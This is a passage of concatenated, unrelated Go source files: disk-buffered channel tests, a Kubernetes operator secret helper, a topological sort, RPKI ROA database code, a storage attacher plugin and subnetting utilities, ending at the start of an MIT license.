t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
t.Logf("Received: %d\n", sum1)
if sendBlockedOn != abortNum+1 {
t.Fatalf("Source send timeout on wrong item, expected '%d', got '%d'", abortNum+1, sendBlockedOn)
}
// Get leftover records
d2, src, sink2, _ := prepChan(t, 0, 0, DecMyStr)
close(src)
sum2 := suck(t, sink2)
d2.Close()
fwd, wr, rd = d2.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
t.Logf("Received: %d\n", sum2)
if (sum1 + sum2) != abortNum {
t.Fatalf("Record number mismatch: %d/%d", sum1+sum2, abortNum+1)
}
}
func TestDiskBufferedChan_StuckSink(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, _, _ := prepChan(t, 0, 0, DecMyStr)
OUT:
for i := 0; i < iters; i++ {
select {
case src <- &MyStr{"Data_" + strconv.Itoa(i)}:
case <-time.Tick(time.Second):
t.Logf("Send timeout abort on '%d'", i)
break OUT
}
}
d.Close()
fwd, wr, rd := d.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
if fwd > 0 {
t.Fatalf("Impossible forwards on stuck sink, test broken")
}
// Now check what is on disk
d2, src, sink2, _ := prepChan(t, 0, 0, DecMyStr)
close(src)
sum := suck(t, sink2)
d2.Close()
fwd, wr, rd = d2.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
if rd != uint64(iters) {
t.Fatalf("Record stat number mismatch: %d/%d", rd, iters)
}
if sum != iters {
t.Fatalf("Received number mismatch: %d/%d", sum, iters)
}
}
func TestDiskBufferedChan_SourceClose(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
defer d.Close()
for i := 1; i <= iters; i++ {
src <- &MyStr{"Data_" + strconv.Itoa(i)}
}
close(src)
fwd, wr, rd := d.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
gotnum := suck(t, sink)
t.Logf("Got %d/%d", gotnum, iters)
if gotnum != iters {
t.Fatalf("Expected %d items, got %d", iters, gotnum)
}
}
func TestDiskBufferedChan_SourceCloseAndHalt(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
for i := 1; i <= iters; i++ {
src <- &MyStr{"Data_" + strconv.Itoa(i)}
}
close(src)
fwd, wr, rd := d.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
var abortNum = (rand.Int() % (iters - 1)) + 1
var cnt = 0
for range sink {
cnt++
if abortNum == cnt {
d.HaltAsync()
}
}
t.Logf("Got %d/%d, aborted on %d", cnt, iters, abortNum)
d.WaitHalt()
d.Close()
d, src, sink, _ = prepChan(t, 0, 0, DecMyStr)
defer d.Close()
close(src)
for range sink {
cnt++
}
t.Logf("Got %d/%d", cnt, iters)
if cnt != iters {
t.Fatalf("Expected %d items, got %d", iters, cnt)
}
}
func TestDiskBufferedChan_SourceCloseBufferedSink(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, iters, DecMyStr)
defer d.Close()
for i := 1; i <= iters; i++ {
src <- &MyStr{"Data_" + strconv.Itoa(i)}
}
close(src)
fwd, wr, rd := d.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
time.Sleep(sleepTime*3)
t.Logf("Disk has '%d' records", d.ldbQueue.Length())
if d.ldbQueue.Length() > 0 {
t.Fatalf("'%d' messages got back-sucked after src close", d.ldbQueue.Length())
}
gotnum := suck(t, sink)
t.Logf("Got %d/%d", gotnum, iters)
if gotnum != iters {
t.Fatalf("Expected %d items, got %d", iters, gotnum)
}
}
func TestDiskBufferedChan_SourceCloseHalfBufferedSink(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, iters/2, DecMyStr)
defer d.Close()
for i := 1; i <= iters; i++ {
src <- &MyStr{"Data_" + strconv.Itoa(i)}
}
close(src)
fwd, wr, rd := d.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
time.Sleep(sleepTime*3)
t.Logf("Disk has '%d' records", d.ldbQueue.Length())
gotnum := suck(t, sink)
t.Logf("Got %d/%d", gotnum, iters)
if gotnum != iters {
t.Fatalf("Expected %d items, got %d", iters, gotnum)
}
}
func TestDiskBufferedChan_Consistency(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, 0, DecMyInt)
defer d.Close()
var wg sync.WaitGroup
wg.Add(2)
var sum_src = 0
go func() {
defer wg.Done()
for i := 1; i <= iters; i++ {
num := int(rand.Int31())
src <- &MyInt{num}
sum_src += num
}
}()
var sum_sink = 0
go func() {
defer wg.Done()
for i := 1; i <= iters; i++ {
data := <-sink
sum_sink += data.(*MyInt).Data
}
}()
wg.Wait()
fwd, wr, rd := d.GetStats()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
t.Logf("Summs: %d/%d", sum_src, sum_sink)
if sum_src != sum_sink {
t.Fatalf("Summs mismatch: %d/%d", sum_src, sum_sink)
}
}
func BenchmarkDiskBufferedChan_FWD(b *testing.B) {
os.RemoveAll(dbDirectory)
src := make(chan interface{})
dbch, sink, err := NewDiskBufferedChan(dbDirectory, 0, DecMyStr, src)
if err != nil {
b.Fatalf("Error: %s", err)
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
src <- &MyStr{strconv.Itoa(i)}
<-sink
}
b.StopTimer()
fwd, wr, rd := dbch.GetStats()
b.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
dbch.Close()
}
func BenchmarkDiskBufferedChan_DiskRnW(b *testing.B) {
os.RemoveAll(dbDirectory)
src := make(chan interface{})
dbch, sink, err := NewDiskBufferedChan(dbDirectory, 0, DecMyStr, src)
if err != nil {
b.Fatalf("Error: %s", err)
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
src <- &MyStr{strconv.Itoa(i)}
}
close(src)
for i := 0; i < b.N; i++ {
<-sink
}
b.StopTimer()
fwd, wr, rd := dbch.GetStats()
b.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
dbch.Close()
}
type testLogger struct {
testing *testing.T
}
func (l *testLogger) Debug(args ...interface{}) {
l.testing.Log(args...)
}
func (l *testLogger) Debugf(format string, args ...interface{}) {
l.testing.Logf(format, args...)
}
func (l *testLogger) Info(args ...interface{}) {
l.testing.Log(args...)
}
func (l *testLogger) Infof(format string, args ...interface{}) {
l.testing.Logf(format, args...)
}
func (l *testLogger) Warn(args ...interface{}) {
l.testing.Log(args...)
}
func (l *testLogger) Warnf(format string, args ...interface{}) {
l.testing.Logf(format, args...)
}
func (l *testLogger) Error(args ...interface{}) {
l.testing.Error(args...)
}
func (l *testLogger) Errorf(format string, args ...interface{}) {
l.testing.Errorf(format, args...)
}
|
package database
import (
"context"
"io/ioutil"
"os"
kciv1alpha1 "github.com/kloeckner-i/db-operator/pkg/apis/kci/v1alpha1"
"github.com/kloeckner-i/db-operator/pkg/utils/kci"
"github.com/sirupsen/logrus"
k8serrors "k8s.io/apimachinery/pkg/api/errors"
)
func (r *ReconcileDatabase) createInstanceAccessSecret(dbcr *kciv1alpha1.Database) error {
if backend, _ := dbcr.GetBackendType(); backend != "google" {
logrus.Debugf("DB: namespace=%s, name=%s %s doesn't need instance access secret skipping...", dbcr.Namespace, dbcr.Name, backend)
return nil
}
data, err := ioutil.ReadFile(os.Getenv("GCSQL_CLIENT_CREDENTIALS"))
if err != nil {
return err
}
newName := GCSQLClientSecretName
secretData := make(map[string][]byte)
secretData["credentials.json"] = data
newSecret := kci.SecretBuilder(newName, dbcr.GetNamespace(), secretData)
err = r.client.Create(context.TODO(), newSecret)
if err != nil {
if k8serrors.IsAlreadyExists(err) {
// if configmap resource already exists, update
err = r.client.Update(context.TODO(), newSecret)
if err != nil {
logrus.Errorf("DB: namespace=%s, name=%s failed updating instance access secret", dbcr.Namespace, dbcr.Name)
return err
}
} else {
logrus.Errorf("DB: namespace=%s, name=%s failed creating instance access secret - %s", dbcr.Namespace, dbcr.Name, err)
return err
}
}
logrus.Infof("DB: namespace=%s, name=%s instance access secret created", dbcr.Namespace, dbcr.Name)
return nil
}
|
package main
import "sync"
func main() {
mu := &sync.Mutex{}
mu.Lock()
}
|
/*
* @File: models.token.go
* @Description: Define quais informações de erro serão retornadas aos clientes
* @Author: Carlos Henrique Lemos (chenriquelemos@gmail.com)
*/
package models
type Error struct {
Code int `json:"código" exemplo:"27"`
Message string `json:"mensagem" exemplo:"Mensagem de Erro"`
}
|
package main
import "fmt"
type intSet struct {
size int
elements map[int]struct{}
}
func NewIntSet() intSet {
return intSet{size: 0, elements: make(map[int]struct{})}
}
func (s *intSet) Add(elem int) {
if _, exists := s.elements[elem]; !exists {
s.elements[elem] = struct{}{}
s.size++
}
return
}
func (s *intSet) Remove(elem int) {
if _, exists := s.elements[elem]; exists {
delete(s.elements, elem)
s.size--
}
return
}
func (s *intSet) Contains(elem int) bool {
_, exists := s.elements[elem]
return exists
}
func (s *intSet) GetAnyElement() (int, error) {
if len(s.elements) == 0 {
return 0, fmt.Errorf("set is empty")
}
var elem int
for k, _ := range s.elements {
elem = k
break
}
return elem, nil
}
// Return true if cycle exists.
func checkCycleFrom(start int, adjs [][]int, whiteSet, graySet, blackSet intSet) bool {
if blackSet.Contains(start) {
return false
}
if graySet.Contains(start) {
return true
}
if whiteSet.Contains(start) {
whiteSet.Remove(start)
graySet.Add(start)
}
// Explore all adjacencies
for i := 0; i < len(adjs[start]); i++ {
cycleExists := checkCycleFrom(adjs[start][i], adjs, whiteSet, graySet, blackSet)
if cycleExists {
return true
}
}
graySet.Remove(start)
blackSet.Add(start)
return false
}
func checkCycle(adjs [][]int) bool {
whiteSet, graySet, blackSet := NewIntSet(), NewIntSet(), NewIntSet()
for i := 0; i < len(adjs); i++ {
whiteSet.Add(i)
}
for {
elem, err := whiteSet.GetAnyElement()
if err != nil {
break
}
if checkCycleFrom(elem, adjs, whiteSet, graySet, blackSet) {
return true
}
}
return false
}
func topologicalTraversal(start int, adjs [][]int, visited map[int]struct{}, traversal []int) []int {
if _, exists := visited[start]; exists {
return traversal
}
for _, to := range adjs[start] {
traversal = topologicalTraversal(to, adjs, visited, traversal)
}
visited[start] = struct{}{}
traversal = append(traversal, start)
return traversal
}
func findOrder(numCourses int, prerequisites [][]int) []int {
adjs := make([][]int, numCourses)
for i, _ := range adjs {
adjs[i] = []int{}
}
visited := make(map[int]struct{})
leafCheck := make([]bool, numCourses)
for i, _ := range leafCheck {
leafCheck[i] = true
}
for _, pair := range prerequisites {
from, to := pair[0], pair[1]
adjs[from] = append(adjs[from], to)
leafCheck[to] = false
}
if checkCycle(adjs) {
return []int{}
}
order := []int{}
for i := 0; i < numCourses; i++ {
if leafCheck[i] {
// leaf course - this is a course that no other course depends on
order = topologicalTraversal(i, adjs, visited, order)
}
}
for i := 0; i < numCourses; i++ {
if _, exists := visited[i]; !exists {
return []int{}
}
}
return order
}
type testcase struct {
numCourses int
preReqs [][]int
}
func tests() {
testcases := []testcase{
testcase{numCourses: 2, preReqs: [][]int{[]int{1, 0}}},
testcase{numCourses: 4, preReqs: [][]int{[]int{1, 0}, []int{2, 0}, []int{3, 1}, []int{3, 2}}},
testcase{numCourses: 3, preReqs: [][]int{[]int{0, 2}, []int{1, 2}, []int{2, 0}}},
}
for i, tc := range testcases {
order := findOrder(tc.numCourses, tc.preReqs)
fmt.Printf("Test case: %d; order: %v\n", i, order)
}
}
func main() {
// tests()
s1 := NewIntSet()
s1.Add(4)
fmt.Printf("s1.size = %d\n", s1.size)
}
|
package parsevalidate
import (
"errors"
"sync"
"time"
"github.com/cpusoft/goutil/belogs"
"github.com/cpusoft/goutil/jsonutil"
"github.com/cpusoft/goutil/xormdb"
model "rpstir2-model"
"xorm.io/xorm"
)
// add
func addRoasDb(syncLogFileModels []SyncLogFileModel) error {
belogs.Info("addRoasDb(): will insert len(syncLogFileModels):", len(syncLogFileModels))
session, err := xormdb.NewSession()
if err != nil {
return err
}
defer session.Close()
start := time.Now()
belogs.Debug("addRoasDb(): len(syncLogFileModels):", len(syncLogFileModels))
// insert new roa
for i := range syncLogFileModels {
err = insertRoaDb(session, &syncLogFileModels[i], start)
if err != nil {
belogs.Error("addRoasDb(): insertRoaDb fail:", jsonutil.MarshalJson(syncLogFileModels[i]), err)
return xormdb.RollbackAndLogError(session, "addRoasDb(): insertRoaDb fail: "+jsonutil.MarshalJson(syncLogFileModels[i]), err)
}
}
err = updateSyncLogFilesJsonAllAndStateDb(session, syncLogFileModels)
if err != nil {
belogs.Error("addRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail:", err)
return xormdb.RollbackAndLogError(session, "addRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail ", err)
}
err = xormdb.CommitSession(session)
if err != nil {
belogs.Error("addRoasDb(): CommitSession fail :", err)
return err
}
belogs.Info("addRoasDb(): len(syncLogFileModels):", len(syncLogFileModels), " time(s):", time.Since(start))
return nil
}
func addRoaDb(syncLogFileModel *SyncLogFileModel) (err error) {
start := time.Now()
belogs.Debug("addRoaDb(): will add roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName,
" fileType:", syncLogFileModel.FileType)
session, err := xormdb.NewSession()
defer session.Close()
err = insertRoaDb(session, syncLogFileModel, start)
if err != nil {
belogs.Error("addRoaDb(): insertRoaDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
return xormdb.RollbackAndLogError(session, "addRoaDb(): insertRoaDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
}
err = updateSyncLogFileJsonAllAndStateDb(session, syncLogFileModel)
if err != nil {
belogs.Error("addRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
return xormdb.RollbackAndLogError(session, "addRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
}
err = xormdb.CommitSession(session)
if err != nil {
belogs.Error("addRoaDb(): CommitSession fail :", err)
return err
}
belogs.Info("addRoaDb(): roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName, " time(s):", time.Since(start))
return nil
}
// del
func delRoasDb(delSyncLogFileModels []SyncLogFileModel, updateSyncLogFileModels []SyncLogFileModel, wg *sync.WaitGroup) (err error) {
defer func() {
wg.Done()
}()
start := time.Now()
session, err := xormdb.NewSession()
if err != nil {
return err
}
defer session.Close()
syncLogFileModels := append(delSyncLogFileModels, updateSyncLogFileModels...)
belogs.Info("delRoasDb(): will del len(syncLogFileModels):", len(syncLogFileModels))
for i := range syncLogFileModels {
err = delRoaByIdDb(session, syncLogFileModels[i].CertId)
if err != nil {
belogs.Error("delRoasDb(): delRoaByIdDb fail, cerId:", syncLogFileModels[i].CertId, err)
return xormdb.RollbackAndLogError(session, "delRoasDb(): delRoaByIdDb fail: "+jsonutil.MarshalJson(syncLogFileModels[i]), err)
}
}
// only update delSyncLogFileModels
err = updateSyncLogFilesJsonAllAndStateDb(session, delSyncLogFileModels)
if err != nil {
belogs.Error("delRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail:", err)
return xormdb.RollbackAndLogError(session, "delRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail", err)
}
err = xormdb.CommitSession(session)
if err != nil {
belogs.Error("delRoasDb(): CommitSession fail :", err)
return err
}
belogs.Info("delRoasDb(): len(roas), ", len(syncLogFileModels), " time(s):", time.Since(start))
return nil
}
func delRoaDb(syncLogFileModel *SyncLogFileModel) (err error) {
start := time.Now()
belogs.Debug("delRoaDb(): will del roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName)
session, err := xormdb.NewSession()
defer session.Close()
err = delRoaByIdDb(session, syncLogFileModel.CertId)
if err != nil {
belogs.Error("delRoaDb(): delRoaByIdDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
return xormdb.RollbackAndLogError(session, "delRoaDb(): delRoaByIdDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
}
// only del,will update syncLogFile.
// when is add/update, will update syncLogFile in addAsaDb()
if syncLogFileModel.SyncType == "del" {
err = updateSyncLogFileJsonAllAndStateDb(session, syncLogFileModel)
if err != nil {
belogs.Error("delRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
return xormdb.RollbackAndLogError(session, "delRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
}
}
err = xormdb.CommitSession(session)
if err != nil {
belogs.Error("delRoaDb(): CommitSession fail :", err)
return err
}
belogs.Info("delRoaDb(): roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName, " time(s):", time.Since(start))
return nil
}
func delRoaByIdDb(session *xorm.Session, roaId uint64) (err error) {
belogs.Debug("delRoaByIdDb():delete lab_rpki_roa by roaId:", roaId)
// rrdp may have id==0, just return nil
if roaId <= 0 {
return nil
}
belogs.Info("delRoaByIdDb():delete lab_rpki_roa by roaId, more than 0:", roaId)
//lab_rpki_roa_ipaddress
res, err := session.Exec("delete from lab_rpki_roa_ipaddress where roaId = ?", roaId)
if err != nil {
belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_ipaddress fail: roaId: ", roaId, err)
return err
}
count, _ := res.RowsAffected()
belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_ipaddress by roaId:", roaId, " count:", count)
//lab_rpki_roa_ee_ipaddress
res, err = session.Exec("delete from lab_rpki_roa_ee_ipaddress where roaId = ?", roaId)
if err != nil {
belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_ee_ipaddress fail: roaId: ", roaId, err)
return err
}
count, _ = res.RowsAffected()
belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_ee_ipaddress by roaId:", roaId, " count:", count)
//lab_rpki_roa_sia
res, err = session.Exec("delete from lab_rpki_roa_sia where roaId = ?", roaId)
if err != nil {
belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_sia fail: roaId: ", roaId, err)
return err
}
count, _ = res.RowsAffected()
belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_sia by roaId:", roaId, " count:", count)
//lab_rpki_roa_sia
res, err = session.Exec("delete from lab_rpki_roa_aia where roaId = ?", roaId)
if err != nil {
belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_aia fail: roaId: ", roaId, err)
return err
}
count, _ = res.RowsAffected()
belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_aia by roaId:", roaId, " count:", count)
//lab_rpki_roa
res, err = session.Exec("delete from lab_rpki_roa where id = ?", roaId)
if err != nil {
belogs.Error("delRoaByIdDb():delete from lab_rpki_roa fail: roaId: ", roaId, err)
return err
}
count, _ = res.RowsAffected()
belogs.Debug("delRoaByIdDb():delete lab_rpki_roa by roaId:", roaId, " count:", count)
return nil
}
func insertRoaDb(session *xorm.Session,
syncLogFileModel *SyncLogFileModel, now time.Time) error {
roaModel, ok := syncLogFileModel.CertModel.(model.RoaModel)
if !ok {
belogs.Error("insertRoaDb(): is not roaModel, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel))
return errors.New("CertModel is not roaModel type")
}
//lab_rpki_roa
sqlStr := `INSERT lab_rpki_roa(
asn, ski, aki, filePath,fileName,
fileHash,jsonAll,syncLogId, syncLogFileId, updateTime,
state)
VALUES(?,?,?,?,?,
?,?,?,?,?,
?)`
res, err := session.Exec(sqlStr,
roaModel.Asn, xormdb.SqlNullString(roaModel.Ski), xormdb.SqlNullString(roaModel.Aki), roaModel.FilePath, roaModel.FileName,
roaModel.FileHash, xormdb.SqlNullString(jsonutil.MarshalJson(roaModel)), syncLogFileModel.SyncLogId, syncLogFileModel.Id, now,
xormdb.SqlNullString(jsonutil.MarshalJson(syncLogFileModel.StateModel)))
if err != nil {
belogs.Error("insertRoaDb(): INSERT lab_rpki_roa Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
return err
}
roaId, err := res.LastInsertId()
if err != nil {
belogs.Error("insertRoaDb(): LastInsertId :", jsonutil.MarshalJson(syncLogFileModel), err)
return err
}
//lab_rpki_roa_aia
belogs.Debug("insertRoaDb(): roaModel.Aia.CaIssuers:", roaModel.AiaModel.CaIssuers)
if len(roaModel.AiaModel.CaIssuers) > 0 {
sqlStr = `INSERT lab_rpki_roa_aia(roaId, caIssuers)
VALUES(?,?)`
res, err = session.Exec(sqlStr, roaId, roaModel.AiaModel.CaIssuers)
if err != nil {
belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_aia Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
return err
}
}
//lab_rpki_roa_sia
belogs.Debug("insertRoaDb(): roaModel.Sia:", roaModel.SiaModel)
if len(roaModel.SiaModel.CaRepository) > 0 ||
len(roaModel.SiaModel.RpkiManifest) > 0 ||
len(roaModel.SiaModel.RpkiNotify) > 0 ||
len(roaModel.SiaModel.SignedObject) > 0 {
sqlStr = `INSERT lab_rpki_roa_sia(roaId, rpkiManifest,rpkiNotify,caRepository,signedObject)
VALUES(?,?,?,?,?)`
res, err = session.Exec(sqlStr, roaId, roaModel.SiaModel.RpkiManifest,
roaModel.SiaModel.RpkiNotify, roaModel.SiaModel.CaRepository,
roaModel.SiaModel.SignedObject)
if err != nil {
belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_sia Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
return err
}
}
//lab_rpki_roa_ipaddress
belogs.Debug("insertRoaDb(): roaModel.IPAddrBlocks:", jsonutil.MarshalJson(roaModel.RoaIpAddressModels))
if roaModel.RoaIpAddressModels != nil && len(roaModel.RoaIpAddressModels) > 0 {
sqlStr = `INSERT lab_rpki_roa_ipaddress(roaId, addressFamily,addressPrefix,maxLength, rangeStart, rangeEnd,addressPrefixRange )
VALUES(?,?,?,?,?,?,?)`
for _, roaIpAddressModel := range roaModel.RoaIpAddressModels {
res, err = session.Exec(sqlStr, roaId, roaIpAddressModel.AddressFamily,
roaIpAddressModel.AddressPrefix, roaIpAddressModel.MaxLength,
roaIpAddressModel.RangeStart, roaIpAddressModel.RangeEnd, roaIpAddressModel.AddressPrefixRange)
if err != nil {
belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_ipaddress Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
return err
}
}
}
//lab_rpki_roa_ee_ipaddress
belogs.Debug("insertRoaDb(): roaModel.CerIpAddressModel:", roaModel.EeCertModel.CerIpAddressModel)
sqlStr = `INSERT lab_rpki_roa_ee_ipaddress(roaId,addressFamily, addressPrefix,min,max,
rangeStart,rangeEnd,addressPrefixRange)
VALUES(?,?,?,?,?,
?,?,?)`
for _, cerIpAddress := range roaModel.EeCertModel.CerIpAddressModel.CerIpAddresses {
res, err = session.Exec(sqlStr,
roaId, cerIpAddress.AddressFamily, cerIpAddress.AddressPrefix, cerIpAddress.Min, cerIpAddress.Max,
cerIpAddress.RangeStart, cerIpAddress.RangeEnd, cerIpAddress.AddressPrefixRange)
if err != nil {
belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_ee_ipaddress Exec:", jsonutil.MarshalJson(syncLogFileModel), err)
return err
}
}
return nil
}
func getExpireRoaDb(now time.Time) (certIdStateModels []CertIdStateModel, err error) {
certIdStateModels = make([]CertIdStateModel, 0)
t := now.Local().Format("2006-01-02T15:04:05-0700")
sql := `select id, state as stateStr,str_to_date( SUBSTRING_INDEX(c.jsonAll->>'$.eeCertModel.notAfter','+',1),'%Y-%m-%dT%H:%i:%S') as endTime from lab_rpki_roa c
where c.jsonAll->>'$.eeCertModel.notAfter' < ? order by id `
err = xormdb.XormEngine.SQL(sql, t).Find(&certIdStateModels)
if err != nil {
belogs.Error("getExpireRoaDb(): lab_rpki_roa fail:", t, err)
return nil, err
}
belogs.Info("getExpireRoaDb(): now t:", t, " , len(certIdStateModels):", len(certIdStateModels))
return certIdStateModels, nil
}
func updateRoaStateDb(certIdStateModels []CertIdStateModel) error {
start := time.Now()
session, err := xormdb.NewSession()
defer session.Close()
sql := `update lab_rpki_roa c set c.state = ? where id = ? `
for i := range certIdStateModels {
belogs.Debug("updateRoaStateDb(): certIdStateModels[i]:", certIdStateModels[i].Id, certIdStateModels[i].StateStr)
_, err := session.Exec(sql, certIdStateModels[i].StateStr, certIdStateModels[i].Id)
if err != nil {
belogs.Error("updateRoaStateDb(): UPDATE lab_rpki_roa fail :", jsonutil.MarshalJson(certIdStateModels[i]), err)
return xormdb.RollbackAndLogError(session, "updateRoaStateDb(): UPDATE lab_rpki_roa fail : certIdStateModels[i]: "+
jsonutil.MarshalJson(certIdStateModels[i]), err)
}
}
err = xormdb.CommitSession(session)
if err != nil {
belogs.Error("updateRoaStateDb(): CommitSession fail :", err)
return err
}
belogs.Info("updateRoaStateDb(): len(certIdStateModels):", len(certIdStateModels), " time(s):", time.Since(start))
return nil
}
|
package attacher
import (
"github.com/Huawei/eSDK_K8S_Plugin/src/utils/log"
)
type MetroAttacher struct {
localAttacher AttacherPlugin
remoteAttacher AttacherPlugin
protocol string
}
func NewMetroAttacher(localAttacher, remoteAttacher AttacherPlugin, protocol string) *MetroAttacher {
return &MetroAttacher{
localAttacher: localAttacher,
remoteAttacher: remoteAttacher,
protocol: protocol,
}
}
func (p *MetroAttacher) NodeStage(lunName string, parameters map[string]interface{}) (string, error) {
return connectVolume(p, lunName, p.protocol, parameters)
}
func (p *MetroAttacher) NodeUnstage(lunName string, parameters map[string]interface{}) error {
wwn, err := p.ControllerDetach(lunName, parameters)
if err != nil {
return err
}
if wwn == "" {
log.Warningf("Cannot get WWN of LUN %s, the dev may leftover", lunName)
return nil
}
return disConnectVolume(wwn, p.protocol)
}
func (p *MetroAttacher) ControllerAttach(lunName string, parameters map[string]interface{}) (string, error) {
_, err := p.remoteAttacher.ControllerAttach(lunName, parameters)
if err != nil {
log.Errorf("Attach hypermetro remote volume %s error: %v", lunName, err)
return "", err
}
lunWWN, err := p.localAttacher.ControllerAttach(lunName, parameters)
if err != nil {
log.Errorf("Attach hypermetro local volume %s error: %v", lunName, err)
p.remoteAttacher.ControllerDetach(lunName, parameters)
return "", err
}
return lunWWN, nil
}
func (p *MetroAttacher) ControllerDetach(lunName string, parameters map[string]interface{}) (string, error) {
_, err := p.remoteAttacher.ControllerDetach(lunName, parameters)
if err != nil {
log.Errorf("Detach hypermetro remote volume %s error: %v", lunName, err)
return "", err
}
lunWWN, err := p.localAttacher.ControllerDetach(lunName, parameters)
if err != nil {
log.Errorf("Detach hypermetro local volume %s error: %v", lunName, err)
return "", err
}
return lunWWN, nil
}
func (p *MetroAttacher) getTargetISCSIPortals() ([]string, error) {
var availablePortals []string
localPortals, err := p.localAttacher.getTargetISCSIPortals()
if err != nil {
return nil, err
}
availablePortals = append(availablePortals, localPortals...)
remotePortals, err := p.remoteAttacher.getTargetISCSIPortals()
if err != nil {
return nil, err
}
availablePortals = append(availablePortals, remotePortals...)
return availablePortals, nil
}
func (p *MetroAttacher) getTargetRoCEPortals() ([]string, error) {
var availablePortals []string
localPortals, err := p.localAttacher.getTargetRoCEPortals()
if err != nil {
return nil, err
}
availablePortals = append(availablePortals, localPortals...)
remotePortals, err := p.remoteAttacher.getTargetRoCEPortals()
if err != nil {
return nil, err
}
availablePortals = append(availablePortals, remotePortals...)
return availablePortals, nil
}
|
package ssubnetting
import (
"sort"
"strconv"
"strings"
"os"
)
// Llena de lo que se indique, en el rango que se indique, un arreglo
// de enteros de tamaño 4.
func FillArr(arr *[4]int, v, begin, end int) {
for i := begin; i < end; i++ {
arr[i] = v
}
}
// Ordena en orden ascendente o ascendente las redes en función de las máscaras.
func SortMasks(masks []int, typ string) {
switch(typ) {
case "desc":
sort.Ints(masks)
break
case "asc":
sort.Sort(sort.Reverse(sort.IntSlice(masks)))
break
}
}
//Copia los octetos de la primera dirección en la segunda.
func CopyAddr(soucre [4]int, dest *[4]int) {
for i := 0; i < 4; i++ {
dest[i] = soucre[i]
}
}
// Toma un string de la forma x1.x2.x3.x4 y devuelve un
// slice de enteros con cada xi.
func ParseAddr(addr string) ([4]int, bool) {
var intAddr [4]int
var fok error
sepAddr := strings.Split(addr, ".")
l := len(sepAddr)
for i := 0; i < l; i++ {
intAddr[i], fok = strconv.Atoi(sepAddr[i])
if fok != nil {
return intAddr, false
}
}
return intAddr, true
}
//String to sequence of integers.
func StrToSeqOfInt(req string, sep string) ([]int, bool){
var err error
strReq := strings.Split(req, sep)
l := len(strReq)
intReq := make([]int, l)
for i := 0; i < l; i++ {
intReq[i], err = strconv.Atoi(strReq[i])
if(err != nil) {
return intReq, false
}
}
return intReq, true
}
//Obtene lo que haya después de un argumento de línea de comandos.
func GetFlagValue(f string) (string, bool) {
var r string
flg := false
flgExists := false
first := true
l := len(os.Args)
for i := 0; i < l; i++ {
if os.Args[i] == f {
flg = true
flgExists = true
} else if flg && os.Args[i][0] != '-' {
if first {
r += os.Args[i]
first = false
} else {
r += " " + os.Args[i]
}
} else if(flg && os.Args[i][0] == '-') {
break
}
}
return r, flgExists
}
|
/*
The MIT License (MIT)
Copyright (c) 2015 tSURooT <tsu.root@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of
